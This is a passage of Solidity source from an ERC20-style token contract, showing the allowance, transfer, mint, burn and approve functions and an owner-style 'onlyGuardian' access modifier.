            _allowances[_msgSender()][spender].add(addedValue)
        );
        return true;
    }

    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].sub(
                subtractedValue,
                "IERC20: decreased allowance below zero"
            )
        );
        return true;
    }

    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "IERC20: transfer from the zero address");
        require(recipient != address(0), "IERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        _tOwned[sender] = _tOwned[sender].sub(
            amount,
            "IERC20: transfer amount exceeds balance"
        );
        _tOwned[recipient] = _tOwned[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }

    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "IERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply = _totalSupply.add(amount);
        _tOwned[account] = _tOwned[account].add(amount);
        emit Transfer(address(0), account, amount);
    }

    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "IERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        _tOwned[account] = _tOwned[account].sub(
            amount,
            "IERC20: burn amount exceeds balance"
        );
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }

    modifier 
        onlyGuardian() 
    {
         require(
            _msgSender() == settingGuardian, "not writer");
        _;
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "IERC20: approve from the zero address");
        require(spender != address(0), "IERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _setupDecimals(uint8 decimals_) internal virtual {
        _decimals = decimals_;
    }

    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}